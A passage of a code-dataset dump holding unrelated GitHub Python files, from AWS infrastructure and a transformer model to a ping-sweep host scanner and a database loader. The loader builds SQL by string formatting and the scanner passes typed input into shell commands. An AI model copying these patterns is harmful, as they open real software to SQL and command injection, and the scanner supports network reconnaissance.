get_terminal_size\nterminal_width, terminal_height = get_terminal_size((80,25))\nmax_width = terminal_width - max_label_width - max_value_width - 2\n\nfor label, value in data:\n\tprint(label.rjust(max_label_width), plot * int(max_width * value / max_value), value)\n","repo_name":"patatetom/ttybarchart","sub_path":"ttybarchart.py","file_name":"ttybarchart.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24259043296","text":"# -*- coding: utf8 -*-\nimport time\n\nimport pandas as pd\nfrom model.data.GoogleDriveAPIAuth import GoogleAPIAuth\nfrom model.data.VariableSet import VariableSet\nvs = VariableSet()\n\n# 비교 지역 선정 (서울 ~ 제주)\ntarget = [vs.region_Gyeonggi, vs.region_Seoul]\n\n## 스프레드시트 사용\n# 스프레스시트 문서 가져오기\ngd = GoogleAPIAuth()\ndoc = gd.gc.open_by_url(vs.spreadsheet_url)\nws = doc.worksheet('응답결과')\n\n# 기존 입력값 이후 셀부터 결과 입력하도록 설정\nvalues = ws.get_all_values()\nheader, rows = values[0], values[1:]\nexcel_source = pd.DataFrame(rows, columns=header)\nprint('기존 입력셀 개수: ' + str(len(excel_source)))\n# 시작하는 셀 설정\nstart = len(excel_source)\n\nresults = []\n# print(target)\n\nfor region in target:\n for city in region:\n for area, result in region.items():\n print(\"지역: \" + area)\n print(\"지역 내 검색 결과: \" + str(len(result)))\n i = 0\n for data in range(len(result) ):\n # 지역 및 코드를 스프레드시트에 입력\n for category, output in result[i].items():\n if category == 'value':\n lcode = output\n if category == 'description':\n location = output\n i += 1\n # 검색 결과를 리스트 자료형으로 저장\n results.append((lcode, location))\n break\n # 전체 목록을 한번에 저장\n ws.update('A' + str(start + 2), results)\n","repo_name":"alvinshin81/alvinshin","sub_path":"usefulScripts/compareLocationData.py","file_name":"compareLocationData.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43124188056","text":"from aws_cdk.core import (\n Construct,\n Stack,\n Tags,\n)\nfrom aws_cdk.aws_cloudfront import (\n EdgeLambda,\n LambdaEdgeEventType,\n LambdaFunctionAssociation,\n)\nfrom aws_cdk.aws_lambda import (\n Code,\n Runtime,\n)\nfrom aws_cdk.aws_s3 import (\n BlockPublicAccess,\n Bucket,\n BucketEncryption,\n)\n\nfrom openttd.construct.s3_cloud_front import S3CloudFront\nfrom openttd.construct.s3_cloud_front_v2 import S3CloudFrontV2\nfrom openttd.enumeration import Deployment\nfrom openttd.stack.common import lambda_edge\n\n\nclass RedirectStack(Stack):\n application_name = \"Redirect\"\n subdomain_names = [\n \"download\",\n \"farm\",\n \"forum\",\n \"github\",\n \"grfsearch\",\n \"nightly\",\n \"noai\",\n \"nogo\",\n \"proxy.binaries\",\n \"root\",\n \"security\",\n ]\n\n def __init__(self, scope: Construct, id: str, *, deployment: Deployment, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n Tags.of(self).add(\"Application\", self.application_name)\n Tags.of(self).add(\"Deployment\", deployment.value)\n\n bucket_site = Bucket(\n self,\n \"Site\",\n block_public_access=BlockPublicAccess.BLOCK_ALL,\n )\n\n bucket_access_logs = Bucket(\n self,\n \"AccessLogs\",\n encryption=BucketEncryption.S3_MANAGED,\n block_public_access=BlockPublicAccess.BLOCK_ALL,\n )\n\n for subdomain_name in self.subdomain_names:\n func_version = lambda_edge.create_function(\n self,\n f\"Redirect-{subdomain_name}-{deployment.value}\",\n runtime=Runtime.NODEJS_10_X,\n handler=\"index.handler\",\n code=Code.from_asset(f\"./lambdas/redirect-{subdomain_name}\"),\n )\n\n if subdomain_name == \"grfsearch\":\n S3CloudFrontV2(\n self,\n f\"S3CloudFront-{subdomain_name}\",\n subdomain_name=subdomain_name,\n bucket_site=bucket_site,\n bucket_access_logs=bucket_access_logs,\n edge_lambdas=[\n EdgeLambda(\n event_type=LambdaEdgeEventType.ORIGIN_REQUEST,\n function_version=func_version,\n ),\n ],\n forward_query_string_cache_keys=[\"do\", \"q\"],\n )\n else:\n S3CloudFront(\n self,\n f\"S3CloudFront-{subdomain_name}\",\n subdomain_name=subdomain_name,\n bucket_site=bucket_site,\n bucket_access_logs=bucket_access_logs,\n lambda_function_associations=[\n LambdaFunctionAssociation(\n event_type=LambdaEdgeEventType.ORIGIN_REQUEST,\n lambda_function=func_version,\n ),\n ],\n )\n","repo_name":"OpenTTD/aws-infra","sub_path":"openttd/stack/application/redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15424007386","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport os\n\n#website url\n#url = 'https://www.pexels.com/search/model'\nurl = 'https://www.imgmodels.com/new-york/women'\n\npage = requests.get(url)\nsoup = bs(page.text, 'html.parser')\n\nimage_tags = soup.findAll('img')\n#print(image_tags)\n\nif not os.path.exists('models'):\n os.makedirs('models')\n\n#move to new directory\nos.chdir('models')\n\nx = 0\nprint(f\"X is {x}\")\nfor image in image_tags:\n #print(\"image src\")\n print (image.get('data-original'))\n #print (image['alt'])\n \n try:\n url = image.get('data-original')\n source = requests.get(url)\n if source.status_code == 200:\n with open('model-'+str(x)+'.jpg','wb') as f:\n f.write(requests.get(url).content)\n f.close()\n x += 1\n print(f\"x is {x}\")\n except OSError as err:\n print(f\"Something not working {err}\")\n ","repo_name":"klarify-tech/twitter-bot","sub_path":"get-models.py","file_name":"get-models.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71124647274","text":"#!/usr/bin/python\n#coding=utf-8\n# Application that detects alive hosts using ICMP and ARP\n# by FM\n# Python 3\n# -------------------------------------\nimport os, platform, sys, time, re, ipaddress\nfrom datetime import datetime as dt\nfrom subprocess import Popen, PIPE\n\n\n## Scan an ip address in order to check for host liveness\ndef ip_scan(ip, ping_cmd, arping_cmd):\n\n #print(\"Testing ip \" + ip)\n comm1 = ping_cmd + ip\n resp1 = os.popen(comm1)\n\n status = \"DOWN\"\n for line in resp1.readlines():\n if(line.upper().count(\"TTL\")):\n status = \"UP\"\n #print(ip, \"--> Live\")\n break\n\n if(status == \"DOWN\"):\n comm2 = arping_cmd + ip\n resp2 = os.popen(comm2)\n\n for line in resp2.readlines():\n if(line.upper().count(\"RTT\")):\n status = \"UP, NO ICMP\"\n #print(ip, \"--> Live, NO ICMP\")\n break\n\n ## Get target MAC address\n Popen([\"ping\", \"-c 1\", ip], stdout = PIPE)\n pid = Popen([\"arp\", \"-n\", ip], stdout = PIPE)\n s = pid.communicate()[0]\n hasMac = re.search(r\"(([a-f\\d]{1,2}\\:){5}[a-f\\d]{1,2})\", s.decode())\n if hasMac is not None:\n mac = hasMac.groups()[0]\n else:\n mac = 'None'\n\n hostname = 'None'\n ## Get hostname\n ## TODO\n\n ## Set data\n data = (ip,mac,hostname,status)\n if status == \"UP\":\n print(data)\n\n## MAIN -------------------------------------\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n\n try:\n\n ## Validates if the OS is Windows or other\n ## and sets the appropriate commands\n oper = platform.system()\n timeout = 4\n if(oper == \"Windows\"):\n ping_cmd = f\"ping -n 1 -w {timeout} \"\n arping_cmd = f\"arp-ping -n 1 \"\n else:\n ## Ask for the interface for arping\n interface = input(\"Enter the interface: \")\n ping_cmd = f\"ping -c 1 -t {timeout} \"\n arping_cmd = f\"arping -c 1 -i {interface}\"\n \n ## Set the beginning datetime\n t1 = dt.now()\n\n subnets = open(sys.argv[1],\"r\")\n for subnet in subnets:\n subnet = subnet.replace(\"\\n\",\"\").replace(\"\\t\",\"\")\n ## Run the scanner\n print(\"Scanning Subnet: \", subnet)\n\n ## Scans the machines in the defined range\n print(\"Scanning in Progress\")\n\n hosts = [str(ip) for ip in ipaddress.IPv4Network(subnet)]\n for ip in hosts:\n ip_scan(ip, ping_cmd, arping_cmd)\n\n ## Set the ending datetime\n t2 = dt.now()\n \n ## Calculates the scan time and prints it\n total = t2 - t1\n\n print(\"Scanning completed in: \",total)\n\n except KeyboardInterrupt:\n print(\"Execution interrupted: Ctrl+C\")\n sys.exit()\n\n else:\n print('[-] Usage: ' + sys.argv[0] + ' subnet_list.txt')\n","repo_name":"Azkrath/EthicalHacking","sub_path":"Scanners/detect_hosts_v1.py","file_name":"detect_hosts_v1.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32554467984","text":"from sqlalchemy import create_engine, text\nimport os\n\ndb_connection_string = os.environ['DB_CONNECTION_STRING']\n\nengine = create_engine(db_connection_string,\n connect_args={\"ssl\": {\n \"ssl_ca\": \"/etc/ssl/cert.pem\"\n }})\n\n\ndef load_product_from_db(product):\n with engine.connect() as conn:\n str = f'select * from products where product = \"{product}\"'\n result = conn.execute(text(str))\n row = result.all()\n if len(row) == 0:\n return None\n else:\n pro = row[0]._mapping\n return dict(pro)\n\n\ndef load_price_from_db():\n with engine.connect() as conn:\n result = conn.execute(text('select * from products'))\n PRICES = []\n for row in result.all():\n PRICES.append(row._mapping)\n return PRICES\n","repo_name":"HardikChhabra/Website_for_Enactus","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72769477674","text":"import logging\nfrom os import getenv\n\nfrom telethon import TelegramClient\n\nfrom handlers import handle_albums, handle_any_message\n\n\nlog = logging.getLogger(__name__)\n\n\ndef init_bot(targets: list[str]) -> TelegramClient:\n log.info('Initializing client…')\n client = TelegramClient(\n session=getenv('SESSION_NAME') or 'meowgram_parser',\n api_id=getenv('API_ID'),\n api_hash=getenv('API_HASH'),\n )\n log.info('Done')\n log.info('Setting up handlers…')\n handle_albums(client, targets)\n handle_any_message(client, targets)\n log.info('Done')\n return client\n\n\ndef start_bot(client: TelegramClient):\n log.info('Starting client…')\n client.start()\n log.info('Done')\n client.run_until_disconnected()\n","repo_name":"ExposedCat/tg-channels-parser","sub_path":"src/bot_config.py","file_name":"bot_config.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32390049716","text":"#!/usr/bin/env python\n# Usage: collect_gbk_file.py smiles.tsv target_folder\nimport os.path\nimport shutil\nimport sys\nimport pandas as pd\n\n\ndef get_file_path(tsv_file):\n info = pd.read_csv(tsv_file, sep='\\t')\n for idx in info.index:\n folder_path = info.iloc[idx, 0]\n record_id = info.iloc[idx, 1]\n region_id = info.iloc[idx, 2]\n file_region_id = \"000\" + str(region_id)\n file_region_id = file_region_id[-3:]\n gbk_file_name = f'{record_id}.region{file_region_id}.gbk'\n gbk_file_path = os.path.join(folder_path, gbk_file_name)\n yield gbk_file_path\n\n\ndef mv2target(gbk, target_folder):\n changed_file_name = os.path.basename(os.path.dirname(gbk))[:15]\n target = os.path.join(target_folder, f'{changed_file_name}.{os.path.basename(gbk)}')\n shutil.copyfile(gbk, target)\n\nif __name__ == '__main__':\n tsv_file, target_folder = sys.argv[1], sys.argv[2]\n gbk_files = get_file_path(tsv_file)\n for fp in gbk_files:\n mv2target(fp, target_folder)\n","repo_name":"BioGavin/wlabkit","sub_path":"astool/script/others/collect_gbk_file.py","file_name":"collect_gbk_file.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"35027514014","text":"#! /usr/bin/python3.9\nimport actions\nimport item_lib\nimport dbmod\n#character=dbmod.get_row('name','bob','saves')\n#character['items'] = character['items'].split(',')\ncharacter = actions.load_being('bob','saves')\nchoice = \"\"\n\nwhile (choice != 'x'):\n print('''What would you like to test?\n 1 - arena\n 2 - print Character stats\n 3 - slay ROUS\n 4 - enter the store\n 5 - print stats for mouse\n 6 - use item\n 0 - Load character''')\n\n choice = str(input ('make your selection: '))\n actions.wiper()\n print ('You chose ' + choice)\n\n if (choice == '1'):\n actions.arena(character)\n elif (choice == '2'):\n creature = dbmod.get_row('name','mouse','creatures')\n actions.print_status(character)\n elif (choice == '3'):\n actions.combat_victory(character['name'],actions.load_being('ROUS','creatures'))\n elif (choice == '4'):\n actions.home_store.enter()\n elif (choice == '5'):\n opponent = dbmod.get_row('name','mouse','creatures')\n print(opponent['name'])\n elif (choice == '6'):\n item_choice = actions.get_item(character['items'])\n actions.use_item(character,item_choice)\n actions.remove_item(character,item_choice)\n elif (choice == '9'):\n pass\n elif (choice == '0'):\n character=dbmod.get_row('name','bob','saves')\n character['items'] = character['items'].split(',')\n elif (choice == 'x'):\n exit()\n","repo_name":"Destom/GameEngine","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40605855789","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport sys\nsys.path.insert(0, \"../\")\nimport numpy as np\nimport pandas as pd\nimport time\nfrom collections import Counter\n#Preprocessing\nfrom process_data import parse_and_format\n#Keras\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\nimport glob\nfrom categorical_focal_loss import SparseCategoricalFocalLoss\nfrom attention_class import MultiHeadSelfAttention #https://apoorvnandan.github.io/2020/05/10/transformer-classifier/\n\n\nimport pdb\n\n#Arguments for argparse module:\nparser = argparse.ArgumentParser(description = '''A program that reads a keras model from a .json and a .h5 file''')\nparser.add_argument('--variable_params', nargs=1, type= str, default=sys.stdin, help = 'Path to csv with variable params.')\nparser.add_argument('--param_combo', nargs=1, type= int, default=sys.stdin, help = 'Parameter combo.')\nparser.add_argument('--checkpointdir', nargs=1, type= str, default=sys.stdin, help = '''path checkpoints with .h5 files containing weights for net.''')\nparser.add_argument('--datadir', nargs=1, type= str, default=sys.stdin, help = 'Path to data directory.')\nparser.add_argument('--test_partition', nargs=1, type= int, default=sys.stdin, help = 'Which CV fold to test on.')\nparser.add_argument('--outdir', nargs=1, type= str, default=sys.stdin, help = '''path to output dir.''')\n\n\n#FUNCTIONS\n#####FUNCTIONS and CLASSES#####\nclass TokenAndPositionEmbedding(layers.Layer):\n def __init__(self, maxlen, vocab_size, embed_dim):\n super(TokenAndPositionEmbedding, self).__init__()\n self.token_emb = layers.Embedding(input_dim=vocab_size, output_dim=embed_dim)\n self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)\n\n def call(self, x):\n maxlen = tf.shape(x)[-1]\n positions = tf.range(start=0, limit=maxlen, delta=1)\n positions = self.pos_emb(positions)\n x = self.token_emb(x)\n return x + positions\n\nclass EncoderBlock(layers.Layer):\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\n super(EncoderBlock, self).__init__()\n self.att = MultiHeadSelfAttention(embed_dim,num_heads)\n self.ffn = keras.Sequential(\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim),]\n )\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, in_q,in_k,in_v, training): #Inputs is a list with [q,k,v]\n attn_output,attn_weights = self.att(in_q,in_k,in_v) #The weights are needed for downstream analysis\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(in_q + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output, training=training)\n return self.layernorm2(out1 + ffn_output), attn_weights\n\nclass DecoderBlock(layers.Layer):\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\n super(DecoderBlock, self).__init__()\n self.att = MultiHeadSelfAttention(embed_dim,num_heads)\n self.ffn = keras.Sequential(\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim),]\n )\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, in_q,in_k,in_v, training): #Inputs is a list with [q,k,v]\n #Self-attention\n attn_output1,attn_weights1 = self.att(in_q,in_q,in_q) #The weights are needed for downstream analysis\n attn_output1 = self.dropout1(attn_output1, training=training)\n out1 = self.layernorm1(in_v + attn_output1)\n #Encoder-decoder attention\n attn_output2,attn_weights2 = self.att(out1,in_k,in_v) #The weights are needed for downstream analysis\n attn_output2 = self.dropout1(attn_output2, training=training)\n out2 = self.layernorm1(attn_output2 + attn_output1)\n ffn_output = self.ffn(out2)\n ffn_output = self.dropout2(ffn_output, training=training)\n return self.layernorm2(out2 + ffn_output), attn_weights2\n\ndef create_model(maxlen, vocab_size, embed_dim,num_heads, ff_dim,num_layers,num_iterations):\n '''Create the transformer model\n '''\n\n seq_input = layers.Input(shape=(maxlen,)) #Input aa sequences\n seq_target = layers.Input(shape=(maxlen,)) #Targets - annotations\n kingdom_input = layers.Input(shape=(maxlen,4)) #4 kingdoms, Archaea, Eukarya, Gram +, Gram -\n\n ##Embeddings\n embedding_layer1 = TokenAndPositionEmbedding(maxlen, vocab_size, embed_dim)\n embedding_layer2 = TokenAndPositionEmbedding(maxlen, 6, embed_dim+4) #Need to add 4 so that x1 and x2 match\n x1 = embedding_layer1(seq_input)\n #Add kingdom input\n x1 = layers.Concatenate()([x1,kingdom_input])\n x2 = embedding_layer2(seq_target)\n\n #Define the transformer\n encoder = EncoderBlock(embed_dim+4, num_heads, ff_dim)\n decoder = DecoderBlock(embed_dim+4, num_heads, ff_dim)\n #Iterate\n for i in range(num_iterations):\n #Encode\n for j in range(num_layers):\n x1, enc_attn_weights = encoder(x1,x1,x1) #q,k,v\n #Decoder\n for k in range(num_layers):\n x2, enc_dec_attn_weights = decoder(x2,x1,x1) #q,k,v - the k and v from the encoder goes into he decoder\n\n x2 = layers.Dense(6, activation=\"softmax\")(x2) #Annotate\n x_rs = layers.Reshape((maxlen,6))(x2)\n x2 = tf.math.argmax(x_rs,axis=-1) #Needed for iterative training\n x2 = embedding_layer2(x2)\n\n x2, enc_dec_attn_weights = decoder(x2,x1,x1) #q,k,v - the k and v from the encoder goes into he decoder\n preds = layers.Dense(6, activation=\"softmax\")(x2) #Annotate\n #preds = layers.Reshape((maxlen,6),name='annotation')(x2)\n #pred_type = layers.Dense(4, activation=\"softmax\",name='type')(x) #Type of protein\n #pred_cs = layers.Dense(1, activation=\"elu\", name='pred_cs')(x)\n\n\n model = keras.Model(inputs=[seq_input,seq_target,kingdom_input], outputs=preds)\n #Optimizer\n initial_learning_rate = 0.001\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate,\n decay_steps=10000,\n decay_rate=0.96,\n staircase=True)\n\n opt = tf.keras.optimizers.Adam(learning_rate = lr_schedule,amsgrad=True)\n\n #opt = keras.optimizers.Adam(learning_rate=0.001,amsgrad=True)\n #Compile\n model.compile(optimizer = opt, loss= SparseCategoricalFocalLoss(gamma=2), metrics=[\"accuracy\"])\n\n return model\n\ndef load_model(variable_params, param_combo, weights):\n #Params\n net_params = variable_params.loc[param_combo-1]\n #Fixed params\n vocab_size = 21 # Only consider the top 20k words\n maxlen = 70 # Only consider the first 70 amino acids\n #Variable params\n embed_dim = int(net_params['embed_dim']) #32 # Embedding size for each token\n num_heads = int(net_params['num_heads']) #1 # Number of attention heads\n ff_dim = int(net_params['ff_dim']) #32 # Hidden layer size in feed forward network inside transformer\n num_layers = int(net_params['num_layers']) #1 # Number of attention heads\n batch_size = int(net_params['batch_size']) #32\n num_iterations = int(net_params['num_iterations'])\n #Create model\n model = create_model(maxlen, vocab_size, embed_dim,num_heads, ff_dim,num_layers,num_iterations)\n model.load_weights(weights)\n\n #print(model.summary())\n return model\n\ndef get_data(datadir, valid_partition, maxlen):\n '''Get the validation data\n '''\n\n train_meta = pd.read_csv(datadir+'train_meta.csv')\n train_seqs = np.load(datadir+'seqs.npy',allow_pickle=True)\n train_annotations = np.load(datadir+'annotations.npy',allow_pickle=True)\n\n train_CS = train_meta.CS.values\n train_kingdoms = train_meta.Kingdom.values\n train_meta['Type'] = train_meta['Type'].replace({'NO_SP':0,'SP':1,'TAT':2,'LIPO':3})\n train_types = train_meta.Type.values\n #Onehot conversion\n train_kingdoms = np.eye(4)[train_kingdoms]\n\n #Get data\n valid_i = train_meta[train_meta.Partition==valid_partition].index\n #valid\n x_valid_seqs = train_seqs[valid_i]\n x_valid_kingdoms = train_kingdoms[valid_i]\n x_valid_kingdoms = np.repeat(np.expand_dims(x_valid_kingdoms,axis=1),70,axis=1)\n #Random annotations\n x_valid_target_inp = np.random.randint(6,size=(len(valid_i),maxlen))\n x_valid = [x_valid_seqs,x_valid_target_inp,x_valid_kingdoms]\n y_valid = [train_annotations[valid_i],train_types[valid_i]]\n\n return x_valid_seqs,x_valid_target_inp,x_valid_kingdoms, y_valid\n\ndef run_model(model,x_valid_seqs,x_valid_target_inp,x_valid_kingdoms):\n preds = model.predict([x_valid_seqs,x_valid_target_inp,x_valid_kingdoms])\n\n return preds\n\ndef get_pred_types(pred_annotations):\n '''Get the predicted types based on the annotations\n '''\n\n annotation_type_conversion = {0:1,1:2,2:3} #S(0)=SP(1), T(1)=TAT(2),L(2)=LIPO(3) - all other 0 (No SP)\n pred_types = []\n for i in range(len(pred_annotations)):\n if (0 in pred_annotations[i]) or (1 in pred_annotations[i]) or (2 in pred_annotations[i]):\n counts = Counter(pred_annotations[i])\n keys = [*counts.keys()]\n\n key_count=0 #Count the occurance of each annotation - take the max for the type\n key_type = 0\n for key in annotation_type_conversion: #Got through all keys\n if key not in keys:\n continue\n else:\n if counts[key]>key_count:\n key_count=counts[key]\n key_type=annotation_type_conversion[key]\n\n #Save\n pred_types.append(key_type)\n\n else:\n pred_types.append(0)\n\n return np.array(pred_types)\n\n\ndef eval_type_cs(pred_annotations,pred_annotation_probs,pred_types,true_annotations,true_types,kingdom):\n '''Evaluate the capacity to predict the clevage site\n annotation_conversion = {'S':0,'T':1,'L':2,'I':3,'M':4,'O':5}\n annotation [S: Sec/SPI signal peptide | T: Tat/SPI signal peptide | L: Sec/SPII signal peptide | I: cytoplasm | M: transmembrane | O: extracellular]\n S: Sec/SPI signal peptide | T: Tat/SPI signal peptide | L: Sec/SPII signal peptide |\n 'NO_SP':0,'SP':1,'TAT':2,'LIPO':3\n SP = Sec/SPI\n TAT = Tat/SPI\n LIPO = Sec/SPII\n\n Reported for CS:\n Recall, TPR = TP/P\n Precision, PPV = TP/(TP+FP)\n\n Reported for detection\n MCC = (TP*TN-FP*FN)/np.sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\n '''\n\n Types = {'SP':1,'LIPO':3,'TAT':2}\n Signal_type_annotations = {'SP':0,'TAT':1,'LIPO':2} #S,T,L\n #Save\n fetched_types = []\n MCCs = []\n Recalls = []\n Precisions = []\n\n if kingdom == 'EUKARYA':\n Types = {'SP':1} #Only one type in Eukarya\n #Go through all types\n for type_name in Types:\n type_enc = Types[type_name]\n P = np.argwhere(true_types==type_enc)[:,0]\n if len(P)<1:\n continue\n N = np.argwhere(true_types!=type_enc)[:,0]\n #Calc TP and FP\n #Get the pred pos and neg\n pred_P = np.argwhere(pred_types==type_enc)[:,0]\n pred_N = np.argwhere(pred_types!=type_enc)[:,0]\n #TP and TN\n TP = np.intersect1d(P,pred_P).shape[0]\n if TP<1:\n continue\n FP = len(pred_P)-TP\n TN = np.intersect1d(N,pred_N).shape[0]\n FN= len(pred_N)-TN\n #MCC\n MCC = (TP*TN-FP*FN)/np.sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\n\n #Get the CS\n type_annotation = Signal_type_annotations[type_name]\n #Get all true positive CSs\n P_annotations = true_annotations[np.intersect1d(P,pred_P)]\n P_CS = []\n for i in range(len(P_annotations)):\n P_CS.append(np.argwhere(P_annotations[i]==type_annotation)[-1,0])\n\n #Get all pred positive CSs from the true positives (all the other will be wrong)\n P_CS_pred = []\n P_annotations_pred = pred_annotations[np.intersect1d(P,pred_P)]\n P_annotation_probs_pred = pred_annotation_probs[np.intersect1d(P,pred_P)]\n for i in range(len(P_annotations_pred)):\n try:\n pdb.set_trace()\n P_CS_pred.append(np.argwhere(P_annotations_pred[i]==type_annotation)[-1,0])\n except:\n P_CS_pred.append(0)\n\n\n #Get the TP and FP CS\n TP_CS = {0:0,1:0,2:0,3:0} #exact CS, +/-1 error, +/-2 error, +/-3 error\n FP_CS = {0:0,1:0,2:0,3:0}\n for i in range(len(P_CS)):\n CS_diff = P_CS[i]-P_CS_pred[i]\n for d in range(0,4):\n if CS_diff<=d and CS_diff>=-d:\n TP_CS[d]+=1\n else:\n FP_CS[d]+=1\n\n #Add the FPs from the wrong detection\n for d in range(0,4):\n FP_CS[d] += FP\n\n #Calculate CS precision and recall\n CS_precision = {}\n CS_recall = {}\n\n for d in range(0,4):\n try:\n CS_precision[d]=TP_CS[d]/(TP_CS[d]+FP_CS[d])\n CS_recall[d] = TP_CS[d]/P.shape[0]\n except:\n pdb.set_trace()\n\n\n #Save\n fetched_types.append(type_name)\n MCCs.append(MCC)\n Precisions.append([*CS_precision.values()])\n Recalls.append([*CS_recall.values()])\n\n\n return fetched_types, MCCs, Precisions, Recalls\n\n\n######################MAIN######################\nargs = parser.parse_args()\nvariable_params=pd.read_csv(args.variable_params[0])\nparam_combo=args.param_combo[0]\ncheckpointdir = args.checkpointdir[0]\ndatadir = args.datadir[0]\ntest_partition = args.test_partition[0]\noutdir = args.outdir[0]\n\nkingdom_conversion = {'ARCHAEA':0,'NEGATIVE':2,'POSITIVE':3,'EUKARYA':1}\n#Load and run model\nall_pred_annotations = []\nall_pred_annotation_probs = []\nall_true_annotations = []\nall_true_types = []\nall_kingdoms = []\n\n#Get data for each valid partition\nfor valid_partition in np.setdiff1d(np.arange(5),test_partition):\n #weights\n weights=glob.glob(checkpointdir+'vp'+str(valid_partition)+'/*.hdf5')\n if len(weights)<1:\n continue\n #model\n model = load_model(variable_params, param_combo, weights[0])\n #Get data\n x_valid_seqs,x_valid_target_inp,x_valid_kingdoms, y_valid = get_data(datadir, valid_partition,70)\n #Predict\n preds = run_model(model,x_valid_seqs,x_valid_target_inp,x_valid_kingdoms)\n\n #Fetch\n pred_annotations = np.argmax(preds,axis=2)\n true_annotations = y_valid[0]\n true_types = y_valid[1]\n kingdoms = np.argmax(x_valid_kingdoms[:,0,:],axis=1)\n #Save\n all_pred_annotations.extend([*pred_annotations])\n all_pred_annotation_probs.extend([*preds])\n all_true_types.extend([*true_types])\n all_true_annotations.extend([*true_annotations])\n all_kingdoms.extend([*kingdoms])\n\n\n\n#Array conversions\nall_pred_annotations = np.array(all_pred_annotations) #The type will be fetched from the annotations\nall_pred_annotation_probs = np.array(all_pred_annotation_probs)\nall_true_annotations = np.array(all_true_annotations)\nall_true_types = np.array(all_true_types)\nall_kingdoms = np.array(all_kingdoms)\n#Get pred types based on pred annotations\nall_pred_types = get_pred_types(all_pred_annotations)\n#Evaluate per kingdom\nevaluated_kingdoms = []\nall_types = []\nall_MCCs = []\nall_precisions = []\nall_recalls = []\n\nfor key in kingdom_conversion:\n kingdom_indices = np.argwhere(all_kingdoms==kingdom_conversion[key])[:,0]\n #Get pred\n kingdom_pred_annotations = all_pred_annotations[kingdom_indices]\n kingdom_pred_annotation_probs = all_pred_annotation_probs[kingdom_indices]\n kingdom_pred_types = all_pred_types[kingdom_indices]\n #Get true\n kingdom_true_annotations = all_true_annotations[kingdom_indices]\n kingdom_true_types = all_true_types[kingdom_indices]\n #Eval\n fetched_types, MCCs, Precisions, Recalls = eval_type_cs(kingdom_pred_annotations,kingdom_pred_annotation_probs,kingdom_pred_types,kingdom_true_annotations,kingdom_true_types,key)\n\n #Save\n evaluated_kingdoms.extend([key]*len(fetched_types))\n all_types.extend(fetched_types)\n all_MCCs.extend(MCCs)\n all_precisions.extend(Precisions)\n all_recalls.extend(Recalls)\n\n#Create df\neval_df = pd.DataFrame()\neval_df['Kingdom']=evaluated_kingdoms\neval_df['Type']=all_types\neval_df['MCC']=all_MCCs\neval_df['Recall']=all_recalls\neval_df['Precision']=all_precisions\n\neval_df.to_csv(outdir+'eval_df'+str(test_partition)+'.csv')\nprint(eval_df)\n","repo_name":"patrickbryant1/TransPep","sub_path":"model/validation/run_trained.py","file_name":"run_trained.py","file_ext":"py","file_size_in_byte":16650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6110611292","text":"#!~/anaconda3/bin/python\n\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom ast import literal_eval\nimport math as m\n\n\n# for extracting time from db date\ndef extract_time(series):\n temp = pd.DatetimeIndex(series)\n return temp.time\n\n\n# for extracting date from db date\ndef extract_date(series):\n temp = pd.DatetimeIndex(series)\n return temp.date\n\n\n# for converting a string date to datetime\ndef convert_date(string_date):\n d = datetime.datetime.strptime(string_date, '%Y-%m-%d').date()\n return d\n\n\n# for extracting yesterday's date\ndef yesterday_date(n):\n ydate = datetime.date.fromordinal(datetime.date.today().toordinal() - n)\n return ydate\n\n\n# for extracting biweekly date\ndef biweekly_date(start_date, n):\n bdate = datetime.date.fromordinal(start_date.toordinal() - n)\n return bdate\n\n\n# for getting previous date\ndef diff_date(pdate, n):\n previous_date = datetime.date.fromordinal(pdate.toordinal() - n)\n return previous_date\n\n\n# for getting future 